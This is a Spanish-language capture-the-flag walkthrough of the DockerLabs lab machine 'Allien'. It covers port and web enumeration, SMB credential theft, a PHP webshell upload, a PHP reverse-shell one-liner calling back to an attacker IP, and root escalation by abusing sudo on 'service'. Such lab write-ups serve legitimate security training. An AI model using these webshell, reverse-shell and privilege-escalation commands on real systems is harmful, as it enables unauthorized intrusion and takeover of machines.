Allien
Introducción
Sección titulada «Introducción»En este artículo documentamos la resolución de la máquina virtual Allien, desarrollada por Luisillo_o y catalogada con un nivel de dificultad fácil.
El análisis se organiza en tres fases principales:
- Reconocimiento – Identificación de servicios, rutas y posibles vectores de ataque.
- Explotación – Ejecución de vulnerabilidades encontradas para obtener acceso inicial.
- Escalada de privilegios – Obtención de control total del sistema.
Información de la Máquina Virtual
Sección titulada «Información de la Máquina Virtual»- Nombre: Allien
- Autor: Luisillo_o
- Dificultad: Fácil
- Fecha de creación: 10/10/2024
Paso 0: Instalación y Despliegue
Sección titulada «Paso 0: Instalación y Despliegue»-
Descargamos la máquina desde DockerLabs.
-
Descomprimimos el paquete:
Ventana de terminal unzip Allien.zip -
Ejecutamos el despliegue:
Ventana de terminal sudo bash auto_deploy.sh Allien.tar
Paso 1: Reconocimiento
Sección titulada «Paso 1: Reconocimiento»1.1 Identificación de la IP
Sección titulada «1.1 Identificación de la IP»Al iniciar la máquina, su IP se muestra en la consola.
Creamos un entorno de trabajo:
mkdir Alliencd Allienmkt # Crea carpetas: content, exploits, nmap, scripts1.2 Escaneo de Puertos
Sección titulada «1.2 Escaneo de Puertos»Ejecutamos Nmap para descubrir puertos:
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPortsExtraemos los puertos abiertos:
extractPorts allPorts
Servicios detectados:
- 22 (SSH)
- 80 (HTTP)
- 139 (SMB)
- 445 (SMB)
1.3 Enumeración Web (Puerto 80)
Sección titulada «1.3 Enumeración Web (Puerto 80)»Lanzamos Gobuster:
gobuster dir -u http://172.17.0.2/ \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt \ -x php,html,txt,js -t 200
Rutas encontradas:
-
Index – Login simple sin vulnerabilidades visibles.
-
info.php – Información de configuración PHP.
-
productos.php – Página de tienda.
1.4 Enumeración SMB
Sección titulada «1.4 Enumeración SMB»Con enum4linux descubrimos usuarios y directorios compartidos:
-
Usuarios:
-
Carpetas compartidas:
Paso 2: Explotación
Sección titulada «Paso 2: Explotación»2.1 Ataque sobre Samba
Sección titulada «2.1 Ataque sobre Samba»Detectamos al usuario satriani7 y realizamos fuerza bruta con crackmapexec:
Listamos los shares accesibles:
Conectamos al servicio SMB:
En Documents/Personal hallamos:
-
Notes.txt → nada útil.
-
Credentials.txt → credenciales de usuarios.
2.2 WebShell (RCE)
Sección titulada «2.2 WebShell (RCE)»Probamos credenciales de administrador. Confirmamos acceso a los shares:
Al revisar, confirmamos que allí se aloja la web. Subimos una webshell:
<?php system($_GET['cmd']); ?>
2.3 Reverse Shell
Sección titulada «2.3 Reverse Shell»Abrimos puerto en la máquina atacante:
nc -nlvp 443Ejecutamos comando con PHP en la webshell:
php -r '$sock=fsockopen("172.17.0.1",443);exec("sh <&3 >&3 2>&3");'
Conexión activa como www-data:
Paso 3: Escalada de Privilegios
Sección titulada «Paso 3: Escalada de Privilegios»3.1 Verificación de privilegios
Sección titulada «3.1 Verificación de privilegios»Comprobamos permisos sudo:
sudo -l
Podemos ejecutar /usr/bin/service como root.
Buscamos en GTFOBins:
Ejecutamos:
sudo service ../../bin/shY obtenemos acceso como root:
Conclusión
Sección titulada «Conclusión»La máquina Allien combina vectores clásicos:
- Reconocimiento web y SMB para obtener credenciales.
- Explotación vía Samba para escalar acceso a la web.
- WebShell + Reverse Shell para ejecución remota.
- Uso indebido de sudo con
servicepara rootear el sistema.
Un CTF ideal para practicar explotación combinada de servicios. 🚀